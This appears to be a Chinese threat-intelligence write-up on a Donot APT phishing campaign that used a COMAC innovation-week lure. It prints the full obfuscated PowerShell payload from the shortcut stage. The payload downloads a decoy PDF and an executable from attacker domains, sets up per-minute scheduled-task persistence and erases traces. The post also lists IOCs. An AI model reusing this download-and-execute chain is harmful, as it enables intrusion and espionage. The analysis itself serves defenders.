一、前言
本次样本于日常威胁狩猎工作中发现,样本利用“中国商用飞机有限责任公司等单位主办的第七届COMAC国际科技创新周”主题进行钓鱼攻击,经样本同源分析归属于APT组织Donot。
如下主题文件用于迷惑用户打开了合法文档。
二、背景
肚脑虫组织,又名Donot,被认为具有南亚某国政府背景。该组织主要针对政府机构、国防军事部门以及商务领域重要人士实施网络间谍活动,受害者包括中国以及巴基斯坦、斯里兰卡等南亚地区国家。
三、样本分析
3.1 第一阶段
初始载荷快捷方式文件“COMAC_Technology_Innovation”,其中包含”目标“指向恶意载荷。
载荷通过PowerShell下载文件、执行文件、创建计划任务等。
详细功能如下。
-
设置 $ProgressPreference 为 ‘SilentlyContinue’,执行下载或其他操作时不显示进度信息,行为隐藏。
-
调用Invoke-WebRequest(iwr)下载用于迷惑用户的中文主题PDF文件,并调用Start-Process(saps)启动。
-
调用Invoke-WebRequest(iwr)下载文件并保存为C:UsersPublicsam,并且重命名为Update.exe。 -
创建计划任务TaskReportingUpdate,每分钟执行一次Update.exe。
-
痕迹清理
原始恶意载荷如下。
C:WindowsSystem32conhost.exe%......WindowsSystem32conhost.exe?
powershell$ProgressPreference='SilentlyContinue';
i''w''rhttps://xingyu.ghshijie.com/cvbcolo09/tqerwer8-OutFileC:\\Users\\Public\\COMAC_Technology_Innovation.pdf;
s''a''p''sC:\\Users\\Public\\COMAC_Technology_Innovation.pdf;
i''w''rhttps://Yuxuan.ghshijie.com/jlytw07sev/fuol91mv-OutFileC:\\Users\\Public\\sam;
r''e''n-PathC:\\Users\\Public\\sam-NewNameC:\\Users\\Public\\Update.exe;
c''p''iC:\\Users\\Public\\COMAC_Technology_Innovation.pdf-destination.;
s''c''h''ta''s''k''s/c''r''e''a''t''e/S''cminute/T''nTaskReportingUpdate/t''r"C:\\Users\\Public\\Update";
e''r''a''s''e*?f.?n?<C:ProgramFiles(x86)MicrosoftEdgeApplicationmsedge.exe
3.2 第二、三阶段
详细的样本分析空了写写,这里简单过一下。
二阶段载荷样本Update.exe基本信息如下。
经过字符和环境初始化、反调试操作后,硬编码在样本中的字符数组”aAm2uiegdx3lrye“,包含大段的base64编码存放密文shellcode。
完成多重解码、解密操作后获取下一阶段明文载荷,调用内核函数,开辟、写入shellcode在内存中,通过异步过程调用执行解密的shellode。
shellcode载荷如下,长度0x5EA80。
IOC
hxxps://xingyu.ghshijie.com/cvbcolo09/tqerwer8-OutFile hxxps://Yuxuan.ghshijie.com/jlytw07sev/fuol91mv-OutFile telsiairegion.xyz xingyu.ghshijie.com Yuxuan.ghshijie.com
8435ed22a631297a13bb3c265b4b71fc d982b2e08ce748b6bbfdbaf11f649a5b c58a7c4baffa401c71a1a333ecd0f956
原文始发于微信公众号(帅仔回忆录):APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击
